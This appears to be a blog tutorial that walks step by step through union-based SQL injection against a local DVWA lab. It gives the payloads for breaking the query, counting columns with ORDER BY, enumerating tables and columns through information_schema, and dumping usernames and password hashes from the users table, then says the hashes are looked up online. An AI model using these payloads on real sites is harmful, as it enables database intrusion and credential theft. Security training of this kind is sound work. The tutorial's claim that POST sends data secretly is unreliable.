Union based SQL injection where an attacker uses the union command to collect the information and merge it into one table. Attacker passes malicious commands and queries in the database to do so
METHODS USED IN WEB APPLICATIONS
- GET – It is the method used by web applications. In this type of request all the request made is sent in plain text i.e. the request is visible at the address bar. It is very insecure method as if one person is shoulder surfing he will be able to grasp your credential and this method is also helpful for several attacks.
eg: www.aaab.com/haha.php?id=1
www.adsadsa.com/index.php?happyness=null
- POST – The method which hides and requests the data from the Database or Server Secretly.
eg: twitter.com/login.phpUnion Based SQL Injection Guide Step by Step
Step 1
To find the 'GET' parameter.
something=something
php?id=something
php?id=cat
php?id=1
php?id=query
Either you click on some link of the web application|site or enter something in the search box.
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#Step 2
To generate a SQL error, to break the query.
1 or 1'
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
'select * from table '
'select * from table' 'Step 3
To count the number of columns in the web application, we will use order by
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
Shows us data
This query means that we are asking the database to arrange the data according to column number 1
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
Shows me data
This query means that we are asking the database to arrange the data according to column number 2
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Gives us an error - Unknown column '3' in 'order clause'
This query means that I am asking the database to arrange the data according to column number 3 But there is no column number 3 --> so it will generate an error
order by n--+
n starts from 1 and ends when i receive an error for the value of n
--+ -> To comment out,
if there is any data passed down after --+, it will not execute at all. we can also use # to comment out the rest of the content.
There are 2 columns in the database.Step 4
To merge the data of all the columns, using the UNION command.
union select 1,2,...,n-1--+
n=3
union select 1,2--+
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
ID: 1' union select 1,2--
First name: admin
Surname: admin
ID: 1' union select 1,2--
First name: 1
Surname: 2
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
database() //database name
version() //Database Version NumberStep 5
To call database schema -> information_schema, for getting the information about the table names
Information_schema -> it is a meta table //it contains the name of tables and columns which are present in the database.
information_schema.tables //It stores the name of all the table names in the database.
union select table_name,2 from information_schema.tables--+
or
union select 1,table_name from information_schema.tables--+
We can apply both of them because both the fields are vulnerable otherwise we will go for the one which is vulnerable.
http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#Step 6
I will again call database ki maa for columns names in the table names as users
information_schema
information_schema.columns
union select 1,column_name from information_schema.columns where table_name="users"--+Step 7
To retrieve or dump data from the above info.
DVWA -> Users(User_id,first_name,Last_name,user,Password)
union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+Password is in hashed form so we will go online and check if the hash value of the value is available or not.
